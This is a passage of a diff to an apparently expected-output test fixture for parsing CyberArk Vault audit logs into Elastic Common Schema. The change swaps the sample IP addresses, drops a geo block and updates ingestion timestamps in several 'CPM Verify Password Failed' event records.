\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:04:11\",\"IsoTimestamp\":\"2021-03-15T15:04:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615820651\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -493,22 +449,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -531,7 +476,7 @@ }, "@timestamp": "2021-03-15T16:35:01.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -543,28 +488,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T16:35:01Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n 
\u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615826099\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615826099\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "2", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -573,11 +518,11 @@ "retries_count": "2", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615826099", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", 
@@ -590,9 +535,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493909500Z", - "original": "\u003c7\u003e1 2021-03-15T16:35:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615826099\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:35:01\",\"IsoTimestamp\":\"2021-03-15T16:35:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615826099\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
", + "ingested": "2021-12-09T13:37:01.193619800Z", + "original": "\u003c7\u003e1 2021-03-15T16:35:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615826099\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:35:01\",\"IsoTimestamp\":\"2021-03-15T16:35:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615826099\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", 
@@ -699,7 +644,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493911500Z", + "ingested": "2021-12-09T13:37:01.193625500Z", "original": "\u003c7\u003e1 2021-03-15T16:56:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:56:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:56:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827245\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 10.0.1.20. 
